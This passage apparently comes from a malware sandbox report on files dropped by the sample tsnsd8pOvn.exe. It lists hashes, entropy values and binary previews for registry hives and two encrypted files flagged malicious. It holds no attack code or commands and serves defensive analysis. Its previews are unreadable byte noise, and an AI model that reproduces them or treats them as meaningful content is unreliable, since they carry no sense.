                              Preview:regf.h.....V..n.}...n.....,.Pk..|)r6....7q.U.LO....Q..m`/.2.J`7..I._...~..%. .....d.ym.f..c..1>X........\g{.vK6|...Q.`K.../nkU..K..l...&.;'..}.~..KU.IJ.....:Q/..C.u..}A3.Z.-...M......1..,.Lv.r.='3.~.".Y......N.)`]:...y.....|7D.D.Y.]....e.y...P#..a...IUj.....)#(..I..D.~...).....j-{.....@.....M.......6...FL~.-M`f.j....z...9....; .L...e.\.|.=....H.-.. .W.&O$.l....'(.. ).n.'`8Z.......a..._.5.9..9.iY.4....t:........j2.....b.O.>.:.qJM@-..OPl..}.. +s.g.j.._..)."f%....B.0.....>T.A.....^.vS...).._.4....i.u.l..'...s.[.}.N.e7M.{SQ.PZ.J.8...ZlE%#..DXJ.H...21.;X".....R.B.t...|A.V....I.#........_...q#?....P.,..*I.De`<........5W.\..#.H..|....=X...J......_......6@.....vS^..<..Lm.......4.....$w.....).+g...Q..3?."0}$.^..pc.be<;...Xd..9@.[gnm.v.t....(l.y...Z.H.....y......(....)....I.....Yb@.....i....>.R"X,....r..C.J.@.........f..|.O.\.H.DK.....C=.#.F...$..-...........l.....'...\vc.w......;L'b..RL.g)..........._.rz.2.?...6.j``.\..&L...}..?_....I....{
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):8526
                              Entropy (8bit):7.975001384050207
                              Encrypted:false
                              SSDEEP:192:Rp+W58yKN7q2nHQE1++FmJX/s7h/iOfEfVYsPbgosUMMOf:RuysrnHQEP4ZCfGVDTFY
                              MD5:5D7603ABBA1135CB11427A5C5DE5B6B2
                              SHA1:AEB84ABC31F50179A80ED41D434DAEDFFCDCA8EB
                              SHA-256:10C53E61358152E2B202FC5AA6491F1768FF8E6F50839C7F3456C87092315985
                              SHA-512:504A6AC882416A8F7D3752526553685786E823AC158B90781109879D5589B8D876167D50AB357ED99D31DE482DD31CCFD7BDFCB4294C8820B4B6EC948CFA2954
                              Malicious:false
                              Preview:regf.`....A..m...>..*v.7...~;.V..8....#......ZX9.+.G+......;I...!..I..a...6w..X..........R.Y6N.J|).M.Z.6......c.(....]..r.........<..a..E........kD....&y+L.........|_/Z+....1......T.....FM.S.6..... j.......8..^k&...B/|..J....Y..=..D..Og4...5.(..O....J.s.m.l.`....PN7X.4.Cv....!......a.V..eK.j..Ee...w.6Z..c....{..7... ......dg...Z...yf..t2vG.|.h..3..~< ...\..i..0...........q!I...lh.......Y.)d}q..J.j........R.,......8:..6~0...".Y.;.a..5...r.....h}..f....`...\n.P.y..^..S;.3........q.......s..,......o6...._E.....Ua...2.}.E.j?8...?j.k.bk..!....-......b...'...|kX'.f.9.P......v1d..3.......Az.i.....'.>.m4......U...@0'..6......N..]!`.....^.P.n$.}U`....U......6..#...8..h.7..@~...BlI......@.Q...m."..S..-,?.6...P ".A.2...M.WD..t.)tx.ic.T..F.;Q.C..6.bj...C.V...Qf.3....!a.'....Sd.f\.Q.......W..i...f....E.#....|.6F84o...J.....m....3....l......2.._.@....E........5....>,..^%.7...T.*G-.Zg..........}&.a...........rBH*8./2l..Lv.....M...._..c.G.....G.u..*T
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):8526
                              Entropy (8bit):7.976234367644294
                              Encrypted:false
                              SSDEEP:192:X4kPLaJkwADU0GAdKPrQq3v/9l4bTAKw4NN7butc+2AH7Ln4ebf:X9WJIGJv/9l4bTmYRStc+2AHvLz
                              MD5:C70774B13100871EB438FF312DA869BE
                              SHA1:252C728C843F56778A7291A234E131FFBDC0CE11
                              SHA-256:A6D9471DED48D68F8F736CE44700E75FAACBA6F18C13FB1A4FB93AE9FC038BE4
                              SHA-512:91AF19848F3A735BCB9F195902818389592ECCD6AE9B48C25CFDF0CABEC3745203740BB48BE506B75F0AD8F56D6AEB5DD82A69673D92C4059DDBD988686E4187
                              Malicious:false
                              Preview:regf.T'O^?.s......c.g.....LW..Td.1W..]c>.#q7.~T......_t............M..t+...J;.~tV.......{R`0.<w.`..........K]:n....PRQ.X|..=..Y^x&..9..x@....7.<.'.dLM.$&:6...6./..a.qZ......&..>..~......5..O..d.lm.......8w....Z9=X..]..F.j.T_.B...".lGr.D.b.<....m"2.9a}.[.L..%.4.r...wMX.~..en.f..10T.B..h.@|.B.#..l.I..y.0....".E.......i).....z.%.R.-.we..kw=.7.A..'/Q..M...Y..E.h#...-.k.u%.}[.lMb./.s.rG.....Z.@6.v=e.+q....}Y.r9v...g.Q......7\!.K.|.Bb........T.1.G"*6......cR.FA~...R$.[*..|.....g0I.&.....SE.G.<n[H.G.._;3..Q.5..{..0.......k...).]H..iz.Xi.1#.......Phv..Hj.2j.i`....4.T.....g.._.=..@.X..#.H..ML..1. yP......t...v!..A.D\B......A.s...sGd..K...D%.\..o.m).\..q.`.....@.].k..p.5.t.........W.."8...("0.g..()..Ja..40.}y+..P..$..6..e..*.y...1.:6...b....=....6..Q.`.!".^.....6......D...v.B.z.S.h.J.s.$%x.u.a..........tep&.?.W..,#.y.X.d.O.|a...?^.....id._4.(X.C.(...T....X.](.NX.l.....2.q...m.....B:H.B....%7b..~rR..R....Q.,..u.@.#......:<A...g.m..X."D&.xo.......
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):8526
                              Entropy (8bit):7.975211871671454
                              Encrypted:false
                              SSDEEP:192:vlDxapsnFL0ABNvB7cwsdLU6nSb+RcMebKXXAy6Zy1f:NDxUKFtBNZYXlUpb4DVwywyN
                              MD5:F9890919700D51BF1AF8BD508DD8C50F
                              SHA1:55E0B1598AED2E51D84E5C387E135E21F1CC2FA6
                              SHA-256:210324FFB1724EFE0A5AFFE07C706C9F2DAC12EE107F45210A96B967995FFCE5
                              SHA-512:FD452AD94BEDB830BB143567F5C4C7ACA325981DA99CF17543E9163E81B05539089CE2969F7492FC2839E9C53CA1A8411A45B1A920180E9014E6CD4B50DFDD2F
                              Malicious:false
                              Preview:regf.|dq...>..u..0$F.^;..u...g....-y......I.....IN.6m....Z.....\j&.....m..{;q......q.#....y.P.2"....f....h.^{q...R...*.8.x.z..u5.R.........&.z..iz0....x-.!.....X"H7.fT^.e.'PJ..8.^....t.+.u..A.GEw"`5A...($I\.B...m.k...<..M.:....j..Kqs.=.a.t..e.6(J...."%.yv........6..k..<.......[Ls-o...3.'..m....=..7.>.p+..v..l^..!.p..;$..`./v.K.EI.E..`. .&.Cv.....W..Ay..........e.SWN..M.....3!0z.........F.[1....JTTJ.....g...t.`G.....Gvm7..,..K...M.{mZ9X._.L.F..........r...7.@37...=J..c.....~2..o...'2-.}2.?.j...r...eW......#..s....?...~.yU..MI......m.UG...k..Q.l.....-...Z.\..../J...4..j...Z.......K.B..........q. ..h.u(..`7.<.....x..;j>../d...-*.....K ...8.t...)!.]j.....v.?.9Zw..n$.7...\...3..+F.j..=...C*..F....G@:[...+:;.U......\......+.r......T..'...B.E...A..C...Y.'....>.s....)...H..].2.23d"[....h....5......-[.q.....~.....Mn..:d..ObM.V..,...5..Ht...o.Ig5=..{..[....AvT.va...d.0aK.r&k.....u..Fj...yY_.{._.giH..=3.2kq.k.C....l....;.......p......]...i'.+.
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):8526
                              Entropy (8bit):7.976656965242112
                              Encrypted:false
                              SSDEEP:192:KCPzJFma9Ly4I+Lbqe96fTnszTcBC8WyYysHskSUdh5M7f:btFmIm+fqe96LnsUBtl8xV5s
                              MD5:DF966F824A7E41D34FF28E82837B9ED1
                              SHA1:13EACF9B366491211BE3FB676EB9961B80D881FB
                              SHA-256:7546B1F8F663AF423128FC3B1265B1E7CBB706B30481115B1D58FB35E868563F
                              SHA-512:17A6BCC6C42BAE851EB64E1E10622344C0654D58B3E486DAC20145ECE962D85CB2ECAE46749E1D921348DBB240ABB7D9F058BC3D03AF980B4F776B3BAA3EC575
                              Malicious:false
                              Preview:regf.....P........r+>TW.8O...)....]..Y....r..."y....%J....MHp.../bc.....H..._...........]q....='.bn=X{gz...(.....4.e.....R.hb.j...M.>.o:A..d\^.];.....vdh.DJrP.....[.e\. ..0..i...) g...l..q.(j......,....5....;.$.y..D8h.....:......$Z.I.c.....y...WF..G7.s>T....s.qi.c.....]../[.oG+...P..8._..Vp...W8..g.:..G...l.G...fuo....]!...W....b...,..........h...Sd_2.i.hJ.Em9U[.e.|R..rVh;.:<.....Bq..l8.zmyj....CO.......-.;..%....-........{.J...a;c..5x....A.s_...z1..=P.)`...v..l.o...H..Aq......51.Zg..z....6..;.%..+l..[...s..J.z.....LX.M...#.Q....;.-....o.d.0.e.6..l.TJm..._.../..zL..z..(}8R...1...YAZ....(m"..e..x..{....2......i.f....3...k.O.>Iy....e...C......=..9...o.[u......V.......;'..q..O5..!e.q....!.........cR..m...........{m}.g......s......R.YL.t...OI...........{....g.8H.i....'.j....lO)..<YN....u=.\.....O..}...g..:......A..@.{..=.... .....]6Q],XOby.y.7....p;!;..D.'...>{.8>.o#.4.".Aavm......e'......(v....E...,...Q.X)#.l.`...(..7..bU....')..Wt.E...0...
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):8526
                              Entropy (8bit):7.974658414262163
                              Encrypted:false
                              SSDEEP:192:O0dHx2vO1ctAo9ahW1UsFOMYcagBoBSsDixki2sjvdOR4vf:vdHQO1HopUhcagBISkPwjJn
                              MD5:4B9DE8EB30433D99B05C614410069774
                              SHA1:8E94075BCA2F55B33D45B2397A2886ECE66153D1
                              SHA-256:7F56FC1E738049F3ED921066BF3340253BD76EAC4DA96BAFCBC31C1A895A1DBC
                              SHA-512:42BFB6421DED3E6C4AA6A2459766B6C6CD6D7D9491E14AB239565BC2895BC58F6FEDDFD1607077392E725FBC21E4F9EB2B3BC11C93F137F2DB6E0C5D9B0F27C8
                              Malicious:false
                              Preview:regf..L....Gc.V..p..=..].F..t.....H.. .c).y(./I..O......?......[[.x.?.....+.y`..%=..c...[^K...?M!.W...R..=....)..Z,j..11..:...`@..4..DL.l1..FxCF.........!..q.L.2.1o...*. .o.y.Y....i..~.....NdIL......&-.D...NJ.@F............S.Dn...M............:...].x...`..#I?-N.>X.g.XS.*..uI.j.v. .VW#:....H|...*;wVs....Jc......FEk...hO.9.g9.g..M@..... F...g..lLpg.Q..f.E.....f..l..a..%...>B.In....:N?..#;..H.=XUr..W..JvM.+..+.M.1.....K%O..ex.uo.1.~W.\=h.....".U...}&.H.z8X.G.[..>..NFH.II....... ......4Os...8.]Q@Q./.2_`.A.+y.I....XDc.....\...0f.....p....B..jI.^P...:\..L..^,.>5).9.....ao..%.d.s.T.j7M.$:k.p......[BH.9....h..p5.a.1..I.!.k.4R...fh.Z.q.Re...5........=...i.(.Cn...e....Z........aZ...{n....._..|..}..nKe..5.,.n>..Y....Bq.a....v.|k....}...<L.x...K.:....."....../.,.2...K.-.d.xu.."oHo\O..../JR...T....?'..be......R.C7.{+..8mY.........B.@.....@P...\a.......MC.......z.w../.r1c......_&P.DQB.yf..`T.a.1v1*.)..&.e.Qs......2e.Z.?/.....Ax...C..S2.gk....>.3Xc....
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):8526
                              Entropy (8bit):7.975426251328275
                              Encrypted:false
                              SSDEEP:192:SYWPWM+p2QcqxvFDBb7dl5kk5nNHy5TGJ/iID5mAlgQzxMqSGkf:SzPH+p24Bb7dl5kyH4w/iugCMZ9
                              MD5:0E95CB7B5AE11457CFEFB468270D63F6
                              SHA1:44AD56EBEBE023499009A32AEE923C4D74B99BBB
                              SHA-256:CFCBBC7968435A6D6CFFBE004FA9065192877730376D9BF6B7417406435860F6
                              SHA-512:C8C83BE334F94D61C7CFF6E86546D8C95A7329E7DCC93C0037ADBE1A65EB6DFC5631AB648B60B8CE7F3B372E92A65E22C29A934C2B16D96E34E808AC5BC163EB
                              Malicious:false
                              Preview:regf.K1..........th1..V...u&.3....&./.a.})...../J.....P......&p.....F...'.2.X....v=<.....Y....@Y;r.FM.O.....QH......Y)...k.s...e`.f:..%.vs....u_.....'j..A..AE.q..X..L...[".!G...t.(?c...m.......7.:.....q.h.H....B.`=.NV .\.0.,_....+..xM..O.....A...!...7._(..OK.7.I..:=i....$k{....9p.s....0.._...~<.....w....2....0.D.e..\..q..V"....nyy{..?3CT()['...x.YB.~..^]AJ.MZ._...c.$j....`"...A.;..H#^R..D|..:.SX..Um>y.|h..4.4Y%D..XP..gMq...Hf...0...YU.....N.......?{g..n%,.....?........>S}7~o.%..q.I..j...q.;..+.3u...c6.8.s..B....A.6.m....Y.H.......;..<T71.GUu.*/e+^g%...G.Q3...=....MV.d.}.....`.....\.73.}~.eN.........Q.....D.3<.c..*..dY....M..a...H..y..r..gX.(.....&...H../B...Z....~....hlw..S.^h.-"..`D.......*.`..n.E!.V.r.\bd....?da.Y.F...S.x&....k.m.....[Y......M....w.j...u.>C.....).f..Q.2.7n%...Q....)a.....8^&..Dm..%.~..T.)O.E...RZ.p...A2.......91]K........%a4..=..N..>JG......d............... .N....eJ...; .pLI....<....9X8..D..-.I..j......\.H.?
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):8526
                              Entropy (8bit):7.978837780887769
                              Encrypted:false
                              SSDEEP:192:kUfi4RJdjyt1vS3u/kR6xAMFwbZnAUt8vpI7ySsgsycqdDf:rfi4jdjyttDa6hKb9Dt8vpImdyL
                              MD5:FD10AF804276B424859E2BBE76B7973E
                              SHA1:20F3DF18FBE168809E421A94D84E5745CAE0B9B1
                              SHA-256:80EB2FC7581C2B4206DE957A96737106D548927CF6A1CBB36B95F1072A7F42D3
                              SHA-512:DAA6D8182AE316E2EE4F0696B2CBD3E590C2A83BE9EE9550C9200B5C0DBD6A95D233B74CF2CD71A06D8635B50BD22FC51FBBFCB78BFC517CFAE76835C1078759
                              Malicious:false
                              Preview:regf..\.ziV.....S.._..'..I...v.....2>Z.e.......d.%..a..^..p.8..{!mS.....*.m..o.$...r$u..j.....e.t7-......]~y........]2.....d..>....y..z.!.-.~7.yS..xp>."S...&u.W.zU.I....0......W_.0`....CJ.]o.. .:y.F.7.....gre..@e...H.<.?..y......#....@O_.e....xG4.'...*.....#......U..1m.......xD.....tV%...m.u.._..#!D.%.D.'..f.G......}....z|$..C..s....9..Z..M..o..A.cO..GzK....{..d`7.?....fP...v.A.1.d-@nT.).s..x.L...b..&..|.........}%...n......x....M....L2....LN..yc0.A.W....4..$Q$Nw.O....ff:....Ff..n.....m.V.J....y.e.....{T2.f...0....Q%........l...,k%..0.U.7|..1FR...fJ...H.L....y...0..JuE%\..XXS.d../$^.R7.......:a..owE....D.L......lG.C)p.'.......$..J}.R.SC ...H.B....8.A8..}.7..........6.?..]d;.!.F.}...`..B...lX.4.9.n.=.?......}....U.....%..8{...@...uYC\.|..f2......=.\..V......)..a.Im#.EJ..Yeb'.xb.-...@5ES!...ppdI......[E..ZsO..U:...>v.a.-.n..D;..R..#@o..~.+.3..Ee$.k....RL.\.Z'2.HlA.....].qs."6....O.....P*..#.Z.&..0.|v...st"...?.-.^[.5lQ..x'.."..[
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):8526
                              Entropy (8bit):7.9748048780543295
                              Encrypted:false
                              SSDEEP:192:HFyfKV9OJWzQsQZc814oVz/XeYDu6nQph97Lz0f:l4G9OJ4X81ZlXeYDuXdLz2
                              MD5:D8ACA439E04313EDCAEF10FE7EE64A12
                              SHA1:01DE10D1A6D8C3DF2067987C652DC1A2B4BEF934
                              SHA-256:E2348800A2EB86FEA7CA96A1B0090AE40826841211EC4F881CBF831A28F039F8
                              SHA-512:2F817F3A18F4BF73D569A9B29BA8A484C510E6719E48947F856B724A6B0D4D0B5153722665E0CD7CD96B26EEAD35DC73A07EE6BEA7087567EF704039A11621C6
                              Malicious:false
                              Preview:regf.F....0.a..#....:@&......D?.?.1.t....J..F..Ee.....{..k...6.......L_hh;y...R..$Pm.'9.D..Y...m.>*.$..B......y.D..]..s$...A../..J-;....Q....=.2...ay.8..|....\..O.d..Q{..<6.V.....$.......[._X_i.,.r90...+r.[..8\..T]..P}.!....k2.;.?.r...$...=/.i;@jK.:P.........P.@.K.....8[...r).")^..xv.b...X...k.....y...f...|.{....m.!.Gv.^.".W..^!...U....;.I..?%%.$..r......d.....(..MKt..nNk..BW.~.I.....L:l S9..w..a;..|........Ys.Yuw........oo....\w.En...b.T...b...4#s...EN.D/......X..q..Vy.......Z..6.RM.....R...=.>Lw..T.l.R....H_;P...2*.`vI...l..7.E...PS...WK%_./..l.....:{Z.:.P!.8%..+H.....Jzep.+d[.,.D...1..(..M.I.).%0.s....Z.`+/5X.....8.5....X.c._U.. .:|.....b.D>.......*/{x$...O..,...y....Q!.f....j...$'..\.*..WE......4.).}..R,.8%.^..5.*.,(.,.-..1..A....:V..)|.6.n..........?..%.........k......).....\...v..[.>R..OX../.S..._..?..W.6..Y...N`.l:.......g+s,>.<.....T.."..)rE...'..pf'@km.%....bEH..vT.r...E....r|..[z.f(.+8..i.P'.F.fN.N?.9...z...V~=].......p...
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):8526
                              Entropy (8bit):7.97690487223329
                              Encrypted:false
                              SSDEEP:192:92/6if2nnpKRJN0amwtCz8Mp/03Z5vSnZ/TaEh6ndmwfvG4KHyMgv2f:kPf2nuIkt+R03Zpe/TaC6n86vGb
                              MD5:42D40CB6DC7274924BDC205920712243
                              SHA1:F07A8E99CC729E682221055169BA4296A99E1E91
                              SHA-256:8943D9B4E5C72474ACE29D1E1A773089AFA7AD2B96E3F0E8A7A3CF406AB9BD00
                              SHA-512:F0F308A4D8341BAB3AC607CBE41861A91B60C71BB600724177B5537FBFA3A71547D165E976C1F5E66BFB87AAB625AC70AF0B78468ED07EFD71115AA6F79DF05C
                              Malicious:false
                              Preview:regf.j..y .a[.Z9....m?Fm...}.6=..t..B..ri...4.N.......!t.g .k...B...D...`.....dF/%.[..15...R.v0z...5.T.EUt.~..c.~Y...L.[.c...](....{.@i..1E..U.$.U...1.....[..)..`......(......s..Y......>~.MC....mD.8'.....>.A. ,.1q.uBRF.....]....`.FC....).Pq,w._.....ILU..4>.O.K.Uu.........Vx..j0`. |-.>=.=.!.).3.s...,S...].l........#.L3.2..`wGyf...!...2...,*...R....G........j[9....E.6dHW..,.....%.R..+........a.!.J..C!X...(.....my/..:Os..N._....Q.r.....b.p.G,A...a.T.......y.......v..3.r.z.O.d.N.%Tj..28..Xg..C..Q.ZTt..E.....).Ct_KC>.x.[].&.Dru...L`.......3.2P.\v...r.f.s.d.W ..a......G...J.5.....waN....C.fk.4.>1h/t..S._....$3..!......>-..:.......E!%l..,+.pU.t..s....>.0..Ss.~...D.`..js./........8...B..,(.h..'..U{..##.}.^9..A.....,..H.S...>...j~1.5T.....=-.).Y.*k..!_._@...Dl.:.T.......p...F.h.&...Hu......Y./K!.T.1..f.p.4<I.>a.g.v.e.y]K.&V..!....d._n[9+...s.} p...g.].&.+*.=.cI.._|.R..hP.>..1.M...zc.8..72.......N...K..=.3..{b......3.<( D[........D.]6oU.^;G..
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):65870
                              Entropy (8bit):7.997110627430756
                              Encrypted:true
                              SSDEEP:1536:N0PLRI4co3sU7trdeCdPMNurABQcExknSwBVXqyh:C/F3tr3dPFMic0ISwr3
                              MD5:7B1339BD1D852DDF1A536E383AE4A93E
                              SHA1:FC0E54320BB0EAA63EAC805955346360952C39CC
                              SHA-256:B8DE3407D423054FFBF931878953F6E37C4E98E45590B14F932BF6DA137E3C76
                              SHA-512:828640EF2F19D1813627151FFE157029F87841E3C4679F182E5CD2D3A7374AB3291C5544A63A59B7C2AC42F472920978689CD519D42B42BD7425119414F8447F
                              Malicious:true
                              Preview:......G. N.b.u..?.8.....,..X..%T...t3a....5....P.]...Y.?..}..|..)....fU....E. j....P......`~W.X...9<...fzW..q.;.p.ub..RA........a@..9....@D.i.8...%.i........R....y.....Y.H5....Gb.J...x-..gN.$..kQ.Vrb`Z.%mw.Z.s6_I.m.-.?.9h...&Y....Q...p...0.v.}-.r...H...y...r...Y.2.gh..J.b.....aa.....y!..K....^.y.S...9.../.^ep.:V... ....&..K.Z....?.=0../..K...l.....xO>..~"Al..Q...rZn..w..g....|.,.q_)..M.u/|...b...r.1...G..MpG...:..l.....I.K01..X.K..->!.......SV..h....r..i....F{..F..kpd3.ni].?Os..l...@..k..#i.Y.>K..`.,g......X.f.0..%.........2....}.N...3...x..O...9%j'../...^.`.Z}...+..Du....(...$f.X.D.....'.....k.V.Xt..j4.+..P.`6..%..+0.J...........^<+.7 6.......nc.H.U.t...`.u...G...*./'.F..Ljn.,.8....|,.OX.?..........$.O..o.8.s....:i...(.D.u.d.U'.o...;,....J*W......C.....v...>..S.5.>{..`..[.r.g.TxH.....*M.........0W.~.5h....Y6.H"Y.uI.....V...?...9.@....X...Kr..[2V24..E.q.U._!.5).@.V`.........!.Du...r..:d ..+zE....l.Hu...$.v.....&!,..(...a4.$.xO....<
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):65870
                              Entropy (8bit):7.997487991949987
                              Encrypted:true
                              SSDEEP:1536:hDy4D+ZFRAlQqULA0fgOsLnKK876h7KCpnMlQYvj:hDytZ4DG5xGB8G1RpnKQej
                              MD5:39D050F2125C4845E82355449D693FB5
                              SHA1:99D2E2D5D57F2F59844F85D448E8F3CE6AF72228
                              SHA-256:56ECBF54142F3DE6BA5C432506ECD9DA47673CFAF17074DD8CA4F77172B37C87
                              SHA-512:4F05E5DED8785CEEDB5E26B9F178747E8C04142B392A1489B50D9B95CA282469391EC222BDC7D6517283E71C10CD49DCFBDA57F754BB3B04D402C63878D267CB
                              Malicious:true
                              Preview:.......@.:+h..W..].F.wl...w.1(..D.(.j..".v.#.%2.H.../.?.0...[..#.g...\..;.......P...Ftw.P....#...p..NV.D^..1.).K...m.......Y.k....'kA..m.m.:./.T..v-6.!..%.*u8|.S.e%...8x...SUh........>..Y...T..)....Q.S.p..d1jB.(....N. .Q.|1..f1.RXN6.......z.V....\w......y..^.Y...T...n.1V..j8......,....1....M..... V....M.lQ........H.g....X....J..O...1!..N..W.5.....&...U..G~........Yv%9.so\.'..um...w..f.E..X1..TS.p.O%.........1...N..I.....O.+.fd.s...0....sY...k~o.^.m.|(.$+.....R.^..{...Vu.....rRC.OY.\e .O8..........Z..-O&=.s=.Y.I.#1.T........._.....H.q...........u.TB:X..tT-s(..~...4:y..t....a{....up.Vl..$.w.........^.R.Q'.&M...|..j......-.*"..\.f..i.<k.....={.'...V..!7v.}..TqZ...1...;.+......B.F.y...TO..b.O...'6..#.g....q.?.8..&*:*K.7..#..?M~.d........B|.tO..s....+......pf*.v...$.j.....hd.z.,6O4..B.2....t.~.I..h...i.7..>}.[.W..... ..2....s....vc.g.B..@....N..`.T.%.!..2.Q.wd.oF..}.s.%....+>D@..... .%..Z...6..^.`.....>.].MxIr!..|.b"l.g.m]h'..f...
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):4194638
                              Entropy (8bit):1.304393322439605
                              Encrypted:false
                              SSDEEP:3072:IivkpF6RO1KVNmc+xO+u/R0pYLGFOmNBxx/F1u/YemM7dnVrs3g6sUdEgzyQ5Zt6:jvkKxbt+xRuZ0pqKFNB6zZEckz58
                              MD5:A4906B9B68F8209FB239A85EE9F0ADB2
                              SHA1:56745D2BC47F904523CD42A923DDF01C90F39DF9
                              SHA-256:80F08AED82A6F2C889F1B74F6BEE0F66AFD7B4778CFD9B532DC4D10B82BAD101
                              SHA-512:0AA302B0E599EF949371E86C2B8519476E4FD78524D6D27A87F2E7CE4CDA15482013C3364A019DB02A04989F6D0EB8D13FCB9BAEA294CE7DE862F41CD1686D58
                              Malicious:false
                              Preview:Nostr`.. ..T...>.....Zx{...+.6..[.7. 1J.;1.P|....|....&..7@.....+?X..1...cb(.6..H.}.....`.3n....%..>.i.p....4$.%.....X...T.....&...BK.._\wJ...H...r..n.d.....L./..r....O.}..7..j......H..+.R}..FOd.>+h.L.G.p.j.3.0...J.3.0..O.`5.*.`.5M(7.^L....yAgu.M.*L....v8..aH.L.c~.*W.a... M,....3j6...`ng.4e..|.W!........`f<..q..-#../.6....R=h5.l5.../N.1.......".]..."y.s.t.i.<]...};..Y.'!.W.X........[<..$W.n!......{wa.<m....k*V.C..gC.....E..RGEu..6.I?...s..m.l.3...V.wX..!uRT}.&.J;.2Z$..t...c..p.&R.8..Wo'u.5.J....I$.W...&...3..+.@eU..S%.b.]...eE.M.H!..j5T..0q\q|......y.....!.....-2[.EN._E...i.S..p.;.........7..?....._.>..I./77....G...>.....z....OV....Rjn.x....KcOj%.x)...&.|.....J.Q.1i...C....7...L...\.........X....D...Vm)..U?.@e.;\..9.k.v.|.XU...K4k.r....D.}...y.....q......A..[.J.....-..E.YZ..2..q......t..o..A1;.._.......M$J....w...C4.B.......B.d...g...m...l...G.5.H.[....S.>#i.......H.q^o...s. .........l}NP;A.Bg)...&"..4.e....Z3]...................Q...Zqj.V...
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):12622
                              Entropy (8bit):7.985009442671613
                              Encrypted:false
                              SSDEEP:384:jAdpSS6eItIcxuXH+xOAbYAANbJWUL7VFtv:jAdputQXH+INbJWIXv
                              MD5:DEA586C89931BB66A10B5CEA857061F7
                              SHA1:4F48A351DD85029E267C3D1819F7AB9E662EE1DF
                              SHA-256:35D9061AB1925E79F0D153E00D174098204EFEA4E66579946D7540A6F80B45F7
                              SHA-512:2DE2DC1EE955A8CD2747439532180895525421AE9683D6DBF2081E7B4B7844D9FDA2B9FEED42433D77E0E2EE48408BC25A8555D32660B4A87C8201DCF1D62696
                              Malicious:false
                              Preview:regf...H..Z..9J.....q;..._P.8.g.!.@wYu.xq......r&.`.95.c,4B.....ngh.....r*.m/..Q.d.... .K..p..<<..k"..H\r...ewm.Bc..&1Tn..>>t..i8.<..A...$?....a..=(;..8.q=..s.L.#.c....q..Q..V<....OvzfQ..:2....aX~.........$...pG.......p..j:.R.y.iVP..t..K9.u...T'.L.t..."...(.{....nLO/..,s...Mo.C.hVz.Mln......#U93......G..".0.....-..9....Ia.$}\,.......`h..:...z...4[....c.)-.+.6...x..H.|w..?.....MK..p......}.!..o...;..l...y.Y.. ].....W..y$....i.^....[I..v.T,.7I.e.KW.'I.......H..v.{....i.G.....././.b.D.....ADm..[.......xZ...........v..Ac\TE.d.(...#.....h.~.%.'..XjiS.|.2R....6...B8...^~8.>......i!.....YD.<.......O2.4..k 8BW.jI|..z^...2v..O.e.....2.n.:q......S...N."j.d.X.g...P. .+{..U..UV.bm'.Iz.b...7..V.a......{. ....c..}.cE.9.r\f...m.Z>.G..a;3......F>Qi....".l......g..........Z........x...F...Li{.M.9ib..$7.....m.}..6...9...G...V!E.+.u....%.?x.)......wR.}.T..\.`...3..w.x...t.q.L...G...hQu..<.C...n......t...E.....Bu..W....1t3...\M..L.6.8J.F..w.F......G..
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:MS Windows registry file, NT/2000 or above
                              Category:dropped
                              Size (bytes):16718
                              Entropy (8bit):7.989168111622036
                              Encrypted:false
                              SSDEEP:384:VOzsgmhITtidb3bwjYUSXd80R6oWzNIy2WwpfXO9O:RhITqb5USXd7RdWzNnwpfXqO
                              MD5:77AD8710589688758F7C2F3AA8E14010
                              SHA1:D74B1AE94E334761A66CADAB1AB3BDD6857AD5E0
                              SHA-256:9C2D6BF2D55AAC2E40CB39A4A399C1BA0191CB5009E8F59E0BDE7BDA9249F358
                              SHA-512:2CA8C34127F35F7CE99E59CD53C28B7CEEEE42D8BD1520083BD28D373D97C133F5FFC3B403D2EC2BAB8B8C1D2F7A6811B9EDEA67CCF448D39FEF19E832AA7A24
                              Malicious:false
